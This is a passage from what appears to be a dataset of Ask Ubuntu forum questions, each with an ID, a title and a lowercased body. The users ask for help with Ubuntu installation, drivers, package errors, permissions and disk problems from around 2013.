already the newest version . gir1.2-gnomekeyring-1.0 is already the newest version . grub2-common is already the newest version . zeitgeist-datahub is already the newest version . gstreamer0.10-plugins-good is already the newest version . libnm-glib-vpn1 is already the newest version . libpng12-0 is already the newest version . linux-image-extra-3.8.0-19-generic is already the newest version . gir1.2-gtk-3.0 is already the newest version . compiz-gnome is already the newest version . libgee2 is already the newest version . account-plugin-salut is already the newest version . libgmp10 is already the newest version . lightdm-remote-session-freerdp is already the newest version . gir1.2-vte-2.90 is already the newest version . xdiagnose is already the newest version . update-manager is already the newest version . libgbm1 is already the newest version . libisccfg90 is already the newest version . rhythmbox-plugin-cdrecorder is already the newest version . gstreamer0.10-x is already the newest version . libgucharmap-2-90-7 is already the newest version . rsyslog is already the newest version . libglew1.8 is already the newest version . powermgmt-base is already the newest version . network-manager-gnome is already the newest version . libvisual-0.4-plugins is already the newest version . account-plugin-generic-oauth is already the newest version . iputils-arping is already the newest version . hardening-includes is already the newest version . pulseaudio is already the newest version . gvfs-fuse is already the newest version . xorg-docs-core is already the newest version . xserver-xorg-video-ati is already the newest version . xserver-xorg-video-siliconmotion is already the newest version . gir1.2-appindicator3-0.1 is already the newest version . libufe-xidgetter0 is already the newest version . gstreamer0.10-alsa is already the newest version . python-gconf is already the newest version . gstreamer0.10-tools is already the newest version . libgphoto2-port0 is already the newest version . libglib2.0-0 is already the newest version . gir1.2-peas-1.0 is already the newest version . python-configglue is already the newest version . libatk-bridge2.0-0 is already the newest version . gnome-session-bin is already the newest version . libgomp1 is already the newest version . libmessaging-menu0 is already the newest version . usb-creator-gtk is already the newest version . libgnome-desktop-3-4 is already the newest version . software-properties-gtk is already the newest version . libcupsimage2 is already the newest version . growisofs is already the newest version . libio-string-perl is already the newest version . gnome-power-manager is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . how do i install g++ now ?
332062	setting default path when opening a terminal session	i am newbie to ubuntu . whenever i open a terminal it 's path is set `` /home/varun '' ( as found by typing pwd ) . is there anyway i can make the terminal 's path to be set at `` /home/varun/desktop/java files '' when it opens ?
332076	problem with usb installation ( xbmcbuntu )	this question is about xbmcbuntu , which is basically ubuntu - so i hope it is okay to ask : iv'e been trying for the last many hours to install xbmcbuntu . i 've downloaded to isos 12.2 and 12 - both in intel & nvidia editions ( intel proc . & nvidia gfx ) . ive tried formatting my usbpen to fat , fat32 , ntfs . used universal usb tool , unetbootin and lili . none of which have worked . first of all , my windows 7 is install via usb - the same usb key , so i know what i 'm doing . when i first started trying to install via usb i got a syslinux error , which caused me to try the different usb tools . none of which worked . then i tried formatting the drive to different settings , which now has resulted in to different outcomes . either i get stuck when i try to boot from the usb - nothing happens ( no text or anything ) and then it freezes and needs a hard reboot . or it simply ignores the usbstick and starts booting windows as normal . now - i 'm very confused - can anyone tell my how to install this ? also - have tried lili from windows - thought i 'd might be able to install it from windows . but no drives show up when i get to it in the installer . hopefully some of you know what to do ...
332081	where is the delete button account button in thunderbird 17.0.8 ?	how i can remove an account in my thunderbird ? i have thunderbird 17.0.8 .
332088	ca n't install ubuntu 12.04 over windows . youtube video showing problem	the installation walk-through on ubuntu website shows several windows giving the user options/preferences in the installation . ( http : //www.ubuntu.com/download/desktop/install-desktop-long-term-support ) i never saw the option to install over windows which is what i 'd like to do . here 's a link to the youtube video : http : //www.youtube.com/watch ? v=ypnurnlr4vi i 'm using a dell xps 15 with windows 7 .
332092	unable to share directory on dc++	i am using linuxdc++ on ubuntu 12.10 . i am unable to share folders under file- > preferences- > sharing- > add . everytime i do that i get an error message saying : the temporary download directory can not be shared please could someone help me out here ?
332094	i ca n't see the software source in dash	all though i installed software source , i ca n't see it on the dash .
332102	permissions issue	which would be the right chmod value for a directory where everyone can write on it , but only the owner of the content can delete it ? i thought chmod 1755 path_to_directory would be the right one , but it is n't . i am beginner on linux , i tried finding this on google , but i was n't successful .
332104	open another terminal window with the same ssh session as original window	is there a way to open a terminal window ( or tab ) with another instance of an open ssh session ? edit : i have a terminal window with a remote ssh session into a server . i want to open a new tab connected to the same remote ssh session . with file- > new tab i get another tab but i have to open another ssh session to the remote server .
332107	windows application with .net through playonlinux on ubuntu 12.04 64bit | beginner needs help !	what do i want to do ? run this software in ubuntu 12.04 : achieve planner by effexis ( http : //www.effexis.com/achieve/achieveplanner19download.htm ) . what have i tried so far ? installed playonlinux through software center ( tried to install .net . did not work b/c of 64bit . did research , then moved on to the following steps . ) installed wine 1.7 and 1.6 ( 32bit ) within playonlinux using `` tools/manage wine versions '' installed .net 1.1 ( required by achieve planner ) using the `` install '' window 's `` install a non-listed program '' option . installed achieve planner the same way . where am i now ? unable to launch achieve planner , and unable to interpret the error messages in the log file . background info ubuntu 12.04 64bit acer desktop m3640 | intel® core™2 quad cpu q6600 @ 2.40ghz x 4 | ati radeon hd 3650 | 3gb ram
332108	ubuntu on dell 6430u 256 ssd	i am new to ubuntu and looking for a suitable laptop to run it . could anyone give me his/her experience with a dell latitude 6430u intel core i3 256 ssd and ubuntu 12.04 ? i would like to run it in dual boot mode with windows 7 . dell xps 13 256 ssd ? i have not found an ubuntu release for this model , but dell offers a version with pre-installed 12.04 . can i install windows 7 alongside ? any recommendations for another model ? thank you , nils
332109	how to install zotero in ubuntu ?	i download the tar.bz file from the home page of zotero , extract it and run the file 'run-zotero.sh ' , but it open zotero rather than install it . how to install it ? any help or suggestion will be appreciated !
332110	how do i display menu of an application using shortcut	how do i display menu of an application using keyboard shortcut ? e.g . in libreoffice calc i 'm used to use alt+f to display menu file or alt+w to display window files . but these shortcuts are not working and i have to use mouse to hover over the top bar , wait till the menu appear and click - what an annoying process . i 'm using ubuntu 13.04 .
332111	wo n't pass the terminal on linux 12.10 on a i mac g5	i made a video of booting up with ubuntu 12.10 installed i ca n't pass the terminal.need your help please https : //www.youtube.com/watch ? v=bzip1rxyfg4 & feature=c4-overview & list=uuc6zyessbjvomhwm0wychiw
332112	install svn on ubuntu 12.04	hi i 'm trying to install svn on my ubuntu 12.04 server . i 've installed subversion and apache . is there something else i need to install to get it to work ?
332114	how to update ubuntu 13.04 from 12.04 ?	i want to update my ubuntu version . but how i can update it ?
332121	ca n't launch gnome-terminal	running on ubuntu 13.04 , gnome shell 3.6.3.1 . if i start it from terminanator , i get this error : mia @ mavrica : ~ $ gnome-terminal failed to summon the gconf demon ; exiting . failed to activate configuration server : process /usr/local/libexec/gconfd-2 exited with status 127
332130	is there a faster way to switch between program instances ?	i find it kinda slow to have to wait for the animation when all the instances of a program ( e.g . all open firefox windows ) are placed as thumbnails over the screen . is there a faster/smoother way to switch between instances of a program without having to alt+tab through all programs ? or an easy way to speed up or prevent the animation ? thanks for any suggestions : )
332137	run multiple instances of gnome-system-monitor	is there any way to run multiple instances of gnome-system-monitor ( system monitor ) ? i often find myself needing to use it in multiple sessions ( physical and remote ) on the same machine , and i 'd rather not have to run killall gnome-system-monitor every time .
332141	unable to play mp3 or mp4 files in rhythmbox or movie player	i am unable to play any mp3 or mp4 files . when i try to open any mp3 or mp4 file , both show an error , a python 2.7 plug-in is required .
332146	ca n't use personas in libreoffice 4.1.0.4 on xubuntu 12.04 64-bit	i go to tools - > options - > personalization . i check 'own theme ' then click on 'select theme ' . i found the theme i wanted , copied and pasted the url in the `` select theme ' window . when i click 'ok ' libreoffice crashes . i even tried looking in this folder : /home/jason/.mozilla/firefox/3yvxv88p.default/lwtheme to copy and paste the images into the libreoffice gallery but the images for my current theme are not there . i have images from a previous theme which are also in the libreoffice gallery . i ca n't seem to get personas to work in libreoffice 4.1.0.4 . any thoughts or suggestions ? i am running xubuntu 12.04 64-bit .
332152	software center got stuck/not responding	a few days ago i installed ubuntu 13.04 . after installation i ran few programs one by one to see that if everything worked fine . at that time the software center ran and it listed some software in the window . but now two days after installation , when i open the software center it does not list any software at all . i closed it and ran it from terminal by typing sudo software-center as suggested in some forums , the terminal shows the following error : root @ engrali-optiplex-760 : ~ # sudo software-center 2013-08-13 21:23:50,366 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 75 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . please , can someone help me to solve this problem ?
332153	syslog can not start	i run rsyslog on ubuntu server . after rsyslog starts , it restarts in a loop . here is a piece of /vae/log/syslog : aug 13 16:05:50 ip-10-92-237-215 rsyslogd : rsyslogd 's groupid changed to 103 aug 13 16:05:50 ip-10-92-237-215 rsyslogd : rsyslogd 's userid changed to 101 aug 13 16:05:51 ip-10-92-237-215 kernel : imklog 5.8.11 , log source = /proc/kmsg started . aug 13 16:05:51 ip-10-92-237-215 rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.11 '' x-pid= '' 31895 '' x-info= '' http : //www.rsyslog.com '' ] start aug 13 16:05:51 ip-10-92-237-215 rsyslogd : rsyslogd 's groupid changed to 103 aug 13 16:05:51 ip-10-92-237-215 rsyslogd : rsyslogd 's userid changed to 101 aug 13 16:05:52 ip-10-92-237-215 kernel : imklog 5.8.11 , log source = /proc/kmsg started . aug 13 16:05:52 ip-10-92-237-215 rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.11 '' x-pid= '' 31907 '' x-info= '' http : //www.rsyslog.com '' ] start aug 13 16:05:52 ip-10-92-237-215 rsyslogd : rsyslogd 's groupid changed to 103 aug 13 16:05:52 ip-10-92-237-215 rsyslogd : rsyslogd 's userid changed to 101 aug 13 16:05:53 ip-10-92-237-215 kernel : imklog 5.8.11 , log source = /proc/kmsg started . aug 13 16:05:53 ip-10-92-237-215 rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.11 '' x-pid= '' 31919 '' x-info= '' http : //www.rsyslog.com '' ] start aug 13 16:05:53 ip-10-92-237-215 rsyslogd : rsyslogd 's groupid changed to 103 aug 13 16:05:53 ip-10-92-237-215 rsyslogd : rsyslogd 's userid changed to 101 what could be the problem ?
332154	magic mouse back/forward in browser	i have an apple magic mouse , not the trackpad , and it supports vertical and horizontal scrolling , but it does n't go back/forward in a browser , the way it does on a mac . are there any settings to enable this behaviour ?
332158	restore default boot os to chrome os	i am having a problem with chrubuntu and setting the default os back to chrome os . i have tried sudo cgpt add -i 6 -p 0 -s 1 /dev/sda but all that returns is futility failed to exec /usr/bin/old_bins/cgpt : no such file or directory . how can i fix this ? i have tried everything i know of , including trying to get cgpt back from the old_bins directory . no luck .
332161	`` @ '' in the password breaks exporting proxy variable	i have at the rate in the password ( @ ) that i use to authenticate and use internet in my college . but to set proxy settings from the terminal we have to separate password and proxy host with @ . ubuntu is mistaking my @ in the password to this @ . unfortunately i can not change the password as the site , through which i can change by password , is down . and to set the proxy i did this : sudo gedit /etc/bash.bashrc in terminal and in the end of this file added this line export http_proxy=username : password @ proxyhost : port/ with my details .
332163	how do i install ubuntu 12.04 from a bootable usb pen drive ?	i have made my pen drive bootable . i am 100 % sure there 's nothing wrong with the pen drive . i have a dell inspiron n5010 , i had tried installing ubuntu 12.04 four months back but i dont remember where i went wrong . when i boot my laptop and enter the boot menu ( by pressing the f12 key ) i do n't get an option to boot from usb . what do i do ?
332164	how to check disk partition in unbuntu 12.10 and do partition for other os	i want to check my disk partition in ubuntu as i want to install windows os and create partition
332168	i get 'errors were encountered while processing : steam_latest.deb ' installing steam	makmoonish @ makmoonish-satellite-l655d : ~/downloads $ sudo dpkg -i steam_latest.debselecting previously unselected package steam-launcher . ( reading database ... 195097 files and directories currently installed . ) unpacking steam-launcher ( from steam_latest.deb ) ... dpkg-deb ( subprocess ) : can not copy archive member from 'steam_latest.deb ' to decompressor pipe : unexpected end of file or stream dpkg-deb : error : subprocess paste returned error exit status 2 dpkg : error processing steam_latest.deb ( -- install ) : can not copy extracted data for './usr/lib/steam/bootstraplinux_ubuntu12_32.tar.xz ' to '/usr/lib/steam/bootstraplinux_ubuntu12_32.tar.xz.dpkg-new ' : unexpected end of file or stream errors were encountered while processing : steam_latest.deb
332174	ubuntu 12.04 lts : wireless usb	i have an old wireless usb adapter found and plugged it in . ( edimax 11 mbps wireless mini adapter ) at first it seems to work , letting me choose wich wireless network . after typing the password for my network , it wo n't connect to it . ubuntu sas it 's a wep encoded network . in reality it 's not . does anybody know how i can fix this ? i 've tried different drivers ( even the windows ) but nothing seems to help .
332180	how i can open ( .it ) file ?	i am doing a project in communication field by using ubuntu 13.04 . the project executed by simulation and the output will be in the format of .it files . some body could help me , how can i open these files ?
332184	alternatives to evernote ?	this is my first question . i 'm looking for an evernote type application for ubuntu . basically a way to `` cloud store '' terminal recipes ( like a blog reminder ) that i can access later either in ubuntu or in my android smartphone . any help or recomendations would be much appreciated best regards
332186	ca n't connect to internet and is n't the problem ?	i 've seen people having the same problem as me , although when they went to the network parameters they were able to disable airplane mode and/or turn on the wireless setting , but i am not ... when i try to turn it on , even though airplane mode is deactivated ( which it enables right after i close the parameters window ) it just turns back off right after . i tried rfkill unblock all or sudo rfkill unblock wifi but when it asks me for my password it just does n't do anything and i 'm really wondering why . i tried to restart my laptop , but it did n't help . maybe it 's just a bug , and i have to wait for the newer version but what can i do if i ca n't download it from the internet ?
332189	how do i configure a xorg.conf to use my monitor 's native resolution ?	i 've tried this on my own several ways by reading wiki , and other peoples problems by creating 10-monitor.conf in /usr/share/x11/xorg.conf.d , and rebooting i 've also tried all repository nvidia drivers , ive also tried editing the xorg.conf in /etc/x11/ but i know im doing something wrong , something simple . i just now did a fresh install of 12.04 and did updates , and restarted , i have no proprietary nvidia drivers in use or a xorg.conf generated . heres my xrandr results : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga-1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) tv-1 disconnected ( normal left inverted right x axis y axis ) i 'd like to use the native 16:9 1386x768 60hz . heres my results from sudo gtf 1368 768 60 # 1368x768 @ 60.00 hz ( gtf ) hsync : 47.70 khz ; pclk : 85.86 mhz modeline `` 1368x768_60.00 '' 85.86 1368 1440 1584 1800 768 769 772 795 -hsync +vsync then i did xrandr -- newmode `` 1368x768_60.00 '' 85.86 1368 1440 1584 1800 768 769 772 795 -hsync +vsync then finally added it xrandr -- addmode vga-1 1368x768_60.00 it went there for a sec , then black screened . do i need to create the 10-monitor.conf first or ?
332210	ca n't use my tl-wn725n	i 'm using ubuntu 13.04 3.8.0-27-generic and i can not use my tl-725n nano wireless adapter . lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 005 : id 0bda:8179 realtek semiconductor corp . bus 003 device 004 : id 05e3:0727 genesys logic , inc. microsd reader/writer bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 07d1:3300 d-link system dwa-130 802.11n wireless n adapter ( rev.e ) [ realtek rtl8191su ] bus 001 device 004 : id 2232:1035 bus 002 device 003 : id 8087:07da intel corp . i installed this : https : //code.google.com/p/realtek-8188cus-wireless-drivers-3444749-ubuntu-1304/ but nothing appened , even after reboot . i still can not see the device in the network manager . sudo modprobe r8712u did nothing and here is the result of iwconfig : wlan1 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : '' gagman '' nickname : '' rtl_wifi '' mode : managed frequency:2.462 ghz access point : 00:13 : a3:0a : b8:0d bit rate:54 mb/s sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality=89/100 signal level=71/100 noise level=0/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 dmesg | grep r87 [ 12.628932 ] r8712u : module is from the staging directory , the quality is unknown , you have been warned . [ 12.630039 ] r8712u : staging version [ 12.630049 ] r8712u : register rtl8712_netdev_ops to netdev_ops [ 12.630050 ] r8712u : usb_speed_high with 4 endpoints [ 12.630511 ] r8712u : boot from efuse : autoload ok [ 13.046262 ] r8712u : customerid = 0x0006 [ 13.046264 ] r8712u : mac address from efuse = c8 : be:19 : de : b6:96 [ 13.046264 ] r8712u : loading firmware from `` rtlwifi/rtl8712u.bin '' [ 13.046320 ] usbcore : registered new interface driver r8712u [ 17.937068 ] r8712u : 1 rcr=0x153f00e [ 17.937822 ] r8712u : 2 rcr=0x553f00e [ 40.011329 ] r8712u : wpa_set_encryption , crypt.alg = wep thanks
332211	restoring a unix tar file with ubuntu	i have all of these old dds3 and dds4 tapes that i need to restore the files off of . the only information that i really know is that they were put on the tapes about 10 to 20 years ago using digital unix . they are in a tar file format . i have been using ubuntu 13.04 to try to restore these files but i 've had zero success so far . i have really no idea how to get these files off of here . a couple of commands that we 've tried in terminal are : /media/archive/scsi/linux $ sudo dd if=/dev/st0 ibs=128k | tar -vxf - sudo tar -xzf /dev/st0 /media/archive/scsi/linux /media/archive/scsi/linux is what i am trying to restore to and st0 is the tape drive name . please help me out ! i 'm only an intern ! thanks
332214	how to compile git for solaris under ubuntu ? ( cross compile git )	i 'm renting webspace with ssh access and i want to host a git repository on it . i can log in using ssh and put websites up . however , git is not installed on the server . unfortunately , gcc is also not available on the solaris box , or i could n't find it . so , to find a solution , i 've tried to compile git myself for solaris ( under ubuntu ; i dont have solaris ) and then upload the compiled git to the webspace to use it there . that 's what i 'm trying to do , but failed so far because while building the cross compiler , i get the error stdio.h : no such file or directory in step `` make all-target-libgcc '' which i could not resolve ( google did n't help and i dont really know what i 'm doing there . ) can you help me solve this ? or is there any alternative way to get git on this solaris box ? on the solaris box : > uname -a sunos gaffer 5.10 generic_142901-13 i86pc i386 i86pc i 've described the same problem on superuser yesterday , but did not get any answers yet : http : //superuser.com/questions/630868/how-to-get-git-on-solaris-webspace
332220	how to unmoplease guide me on how to unlock the partition in g parted as i want to allocate space to other operating system ? unt the locked	please guide me on how to unlock the partition in g parted as i want to allocate space to other operating system ?
332224	using ms excel keyboard shortcuts on ubuntu	i recently switched again from windows to ubuntu 13.04 . i use ms excel a lot , and do n't want to exchange it from libre office . for me it runs fine with wine . however the reason i switch back to windows every time i use excel is that ubuntu does n't seem to support the keyboard shortcuts ( alt+ ... ) . instead it opens the unity launcher . did anyone ever got keyboard shortcuts working ? thanks in advance !
332226	did i burn the wrong .iso file ?	i have downloaded and burned the .iso on a mac for installation on a windows xp laptop that wo n't do much more than boot up . i am able to open the folder ( from the dvd ) on the xp laptop and it looks good ( many folders and files ) . when i try to boot from the dvd , it gets caught up in repeating errors that say : [ # # # . # # # ] . [ drm ] nouveau 0000:01.00.0 : failed to idle channel 1 it will follow with the same message to channel 2 . this is repeating until i power off the computer . the computer on which i 'm trying to boot the ubuntu dvd is a dell inspiron e1705 . the graphics card is not known . when i go into the display properties and look at the adapter type is says `` vgasave '' , manufacturer : unknown . i do have obvious display issues but also ca n't connect to the internet from this device either to attempt to load new drivers . is it possible that i have burned the wrong .iso file ? has anybody seen this ? it is a dell inspiron e1705 . the graphics card is not known . when i go into the display properties and look at the adapter type is says `` vgasave '' , manufacturer : unknown . i do have obvious display issues but also ca n't connect to the internet from this device either to attempt to load new drivers .
332227	where can i download wallpapers from the changing `` community wallpaper for ubunu 12.04 ''	i currently have my wallpaper set to the community wallpaper for ubuntu 12.04 that changes throughout the day . i really like the current image that 's on there . is there somewhere that i can go to download the wallpaper to save for later ? thanks !
332235	problem installing ubuntu touch on nexus 4	this is my first attempt to install ubuntu touch . i 've run phablet-flash cdimage-touch -d mako -b and it goes all the way through to info : phablet-flash : flashing system to /home/ham/downloads/phablet-flash/ubuntu-touch/20130808/saucy-preinstalled-system-armel+mako.img < waiting for device > where it just hangs . the phone has rebooted into the screen with the android on its back and the big green arrow 'start ' , but it 's just sitting there and nothing appears to be happening : the phone is just staring at me with the big green arrow and my ubuntu 12.10 desktop is staring at me with the above ' < waiting for device > ' . can anyone help ?
332239	problem installing vlc 12.04 broken dependencies	i am trying to install vlc on my gateway netbook running 12.04 through wubi but whether i try using terminal or the software center i get this error message . the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8+git20130809+r605-0~r43~precise1 ) but it is not going to be installed depends : libavcodec53 ( > = 4:0.8-1~ ) but it is not going to be installed or libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not going to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable depends : libtar0 but it is not installable depends : libva-x11-1 ( > 1.0.15~ ) but it is not installable depends : libva1 ( > 1.0.15~ ) but it is not installable depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not installable recommends : vlc-plugin-notify ( = 2.0.8+git20130809+r605-0~r43~precise1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.8+git20130809+r605-0~r43~precise1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i have spent a good hour on google and the forums trying to resolve this but nothing seems to be working . i have tried using the daily releases ppa . i tried this ... sudo apt-get install -- fix-broken & & sudo apt-get autoremove & & sudo apt-get update & & sudo apt-get install vlc ... but it did n't change anything along with the other methods posted on the forums . i updated just before trying to download vlc but vlc would not download before the update either . any responses would be much appreciated . edit here is the info you wanted . vlc-data : installed : ( none ) candidate : 2.0.8+git20130809+r605-0~r43~precise1 version table : 2.0.8+git20130809+r605-0~r43~precise1 0 500 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ precise/main i386 packages 2.0.8-0ubuntu0.12.04.1 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/universe i386 packages 500 http : //archive.ubuntu.com/ubuntu/ precise-security/universe i386 packages 2.0.1-4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages vlc : installed : ( none ) candidate : 2.0.8+git20130809+r605-0~r43~precise1 version table : 2.0.8+git20130809+r605-0~r43~precise1 0 500 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ precise/main i386 packages 2.0.8-0ubuntu0.12.04.1 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/universe i386 packages 500 http : //archive.ubuntu.com/ubuntu/ precise-security/universe i386 packages 2.0.1-4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages vlc-nox : installed : ( none ) candidate : 2.0.8+git20130809+r605-0~r43~precise1 version table : 2.0.8+git20130809+r605-0~r43~precise1 0 500 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ precise/main i386 packages 2.0.8-0ubuntu0.12.04.1 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/universe i386 packages 500 http : //archive.ubuntu.com/ubuntu/ precise-security/universe i386 packages 2.0.1-4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages libvlccore5 : installed : ( none ) candidate : 2.0.8+git20130809+r605-0~r43~precise1 version table : 2.0.8+git20130809+r605-0~r43~precise1 0 500 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ precise/main i386 packages 2.0.8-0ubuntu0.12.04.1 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/universe i386 packages 500 http : //archive.ubuntu.com/ubuntu/ precise-security/universe i386 packages 2.0.1-4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages libvlc5 : installed : ( none ) candidate : 2.0.8+git20130809+r605-0~r43~precise1 version table : 2.0.8+git20130809+r605-0~r43~precise1 0 500 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ precise/main i386 packages 2.0.8-0ubuntu0.12.04.1 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/universe i386 packages 500 http : //archive.ubuntu.com/ubuntu/ precise-security/universe i386 packages 2.0.1-4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages` thanks for the help .
332242	how to batch organize files ?	i have a directory with gigabytes ( about 8gb ) of small individual files . i want to organize them into directories by date . the date it was created is part of the filename . here is an example of a filename : 4rcpblockcoverltrednalaserfalse07-10-2012-11-50-14-656.doc.gz i want the docs directory setup like this : docs_by_date 2013 01 02 03 04 if the destination directory does not exist it should be created . after verification of a successful copy the source file should be removed . i 'm no super guru with bash , a lot of the symbols i still do n't know what they mean , so an explanation would be great of what the script is doing .
332246	what to do if you removed /usr/local ?	i wanted to move directory to /usr/local but instead mv -r typed rm -r. is there any way to recover deleted data on ubuntu 12.04 ? any suggestions ? update : i understand that this losing not so difficult . but what about the future . is any way to safe removed files ( as at windows for ex . - all deleted files gona trash ) and would recover them if deleted accidentally ? or better use backup and it protects this really weak place at ubuntu ?
332250	best ubuntu samba guide	after trying the official ubuntu samba guide and failing , then a youtube video guide and failing to make samba work , i am asking all of you which one is best as there are so many to choose from . i tried ftp and nfs after these and got both to work , but found out ftp was n't exactly a live system and windows 7 pro ca n't connect to nfs , so i have a good general feeling for configuration in general thanks
332254	is ubuntu compatible with my 32 bit windows 7 system ?	i 'm brand new to ubuntu and not tech savvy like the rest of this group apperantly is . i have an older machine ( 32 bit windows 7 ) and i 'm curious about ubuntu and want to try it out , if it works well i 'll install it on my toshiba laptop ( 32 bit windows vista home premium ) next !
332260	start irexec on boot with a script	i created a file in /etc/init.d/startirexec.sh with the contents : # ! /bin/bash # # # begin init info # provides : irexec # required-start : $ all # required-stop : $ all # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : starts instance of irexec # description : starts instance of irexec # # # end init info irexec -d exit 0 i then do a sudo chmod +x startirexec.sh sudo update-rc.d startirexec.sh defaults everything seems to go ok . i reboot but irexec is not loaded . if i do a sudo ./startirexec.sh manually it loads just fine . am i missing something ?
332262	2 ethernet ports , one on 100mbps , one on 1000mbps problem ?	i ran across a strange sight when i ran ifconfig first time today . i have a gigabit server card with 2 ports . i have it set in a bond for 802.3ad usage as my switch supports it . it appears though that one port is at 100mbps and one is at 1000mbps . any good reason for this ? is there any fix to get both connections at 1000mbps ? ? ?
332263	something went wrong with my external hd ( ubuntu ca n't mount it )	here is my output from the fdisk command : sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00043809 device boot start end blocks id system /dev/sda1 * 2048 973105151 486551552 83 linux /dev/sda2 973107198 976771071 1831937 5 extended /dev/sda5 973107200 976771071 1831936 82 linux swap / solaris disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5387f1b4 device boot start end blocks id system /dev/sdb1 2048 625140399 312569176 7 hpfs/ntfs/exfat from my limited knowledge of ubuntu -- i 'm guessing my external is being detected by my os , but it 's not being mounted . backstory : i was trying to use an iso file that i had on my external using acetoneiso -- then everything froze up . i forced a shut down/reboot , then when i rebooted , my hd would n't mount . it did n't even give me an error message , it just did n't work . what 's up ? help ? edit : @ alaa : i was just about to add this info . i have just tried manually mounting my drive , and this is the output : $ sudo mkdir /media/toshiba_ext $ sudo mount -t ntfs-3g /dev/sdb1 /media/toshiba_ext ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read $ mftmirr : input/output error failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . edit 2 : this is the result after attempting to run an ntfsfix $ sudo ntfsfix /dev/sdb1 mounting volume ... ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read $ mftmirr : input/output error failed attempting to correct errors ... processing $ mft and $ mftmirr ... reading $ mft ... ok reading $ mftmirr ... ntfs_attr_pread_i : ntfs_pread failed : input/output error failed failed to read $ mftmirr : input/output error hypothesis : did i short out the drive when i forced a reboot on it ? i know it 's bad to do that -- but i 've had to do that before , both on windows-based systems and since i started using ubuntu -- and this is the first time anything 's gone wrong . just as an fyi to any answerers , my family is going out to eat fairly shortly , so i will be away for the next hour or so . i 'm guessing my next logical step is to run a chkdsk in a windows-based environment , so i will attempt that when i get home . based on the results of that , what do i do next ? edit 3 